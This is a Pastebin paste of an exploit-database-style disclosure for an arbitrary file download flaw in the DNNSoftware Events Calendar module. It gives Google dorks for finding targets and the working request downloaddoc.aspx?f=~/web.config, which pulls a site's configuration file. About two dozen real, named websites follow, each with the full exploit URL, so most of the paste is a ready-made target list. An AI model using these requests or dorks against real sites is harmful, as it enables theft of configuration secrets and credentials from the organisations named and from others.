KingSkrupellos

DNNSoftware EventsCalendar Modules 1.x File Download

Jan 17th, 2019
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.77 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 18/01/2019
  7. # Vendor Homepage : dnnsoftware.com
  8. # Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
  9. # Software Version : 1.x and All Versions
  10. # Tested On : Windows and Linux
  11. # Category : WebApps
  12. # Exploit Risk : Medium
  13. # Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors''
  14. inurl:''/desktopmodules/eventscalendar/''
  15. # Vulnerability Type : CWE-16 [ Configuration ]
  16.  
  17. ####################################################################
  18.  
  19. # Description :
  20. *************
  21.  
  22. * Events Calendar is a calendar to add and display events with time and description in rich text editor.
  23.  
  24. * DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions
  25.  
  26. is prone to a vulnerability that lets attackers download arbitrary files because
  27.  
  28. the application fails to sufficiently verify user-supplied input.
  29.  
  30. * This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.
  31.  
  32. * The attacker can download and read all and any files known by the name via '?f=' parameter.
  33.  
  34. # Arbitrary File Download Exploit :
  35. *******************************
  36.  
  37. /desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  38.  
  39. /desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
  40.  
  41. ####################################################################
  42.  
  43. # Example Vulnerable Sites :
  44. *************************
  45.  
  46. Note : (38.95.37.77) => There are 73 domains hosted on this server.
  47.  
  48. [+] abcga.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  49.  
  50. [+] abcgmc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  51.  
  52. [+] mnabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  53.  
  54. [+] abclaventura.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  55.  
  56. [+] abccarolinas.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  57.  
  58. [+] abcnjc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  59.  
  60. [+] abcpnw.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  61.  
  62. [+] abcwestwa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  63.  
  64. [+] abc-chesapeake.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  65.  
  66. [+] ocl.net/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  67.  
  68. [+] aeawave.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  69.  
  70. [+] tkhobby.nu/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  71.  
  72. [+] abcark.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  73.  
  74. [+] av-warehouse.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  75.  
  76. [+] nocabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  77.  
  78. [+] ezt.ca/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  79.  
  80. [+] abccentralcal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  81.  
  82. [+] abcwpa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  83.  
  84. [+] abcnevada.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  85.  
  86. [+] abcsocal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  87.  
  88. [+] ctabc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  89.  
  90. [+] abcalaska.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  91.  
  92. [+] abcfirstcoast.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
  93.  
  94. ####################################################################
  95.  
  96. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  97.  
  98. ####################################################################
Add Comment
Please, Sign In to add comment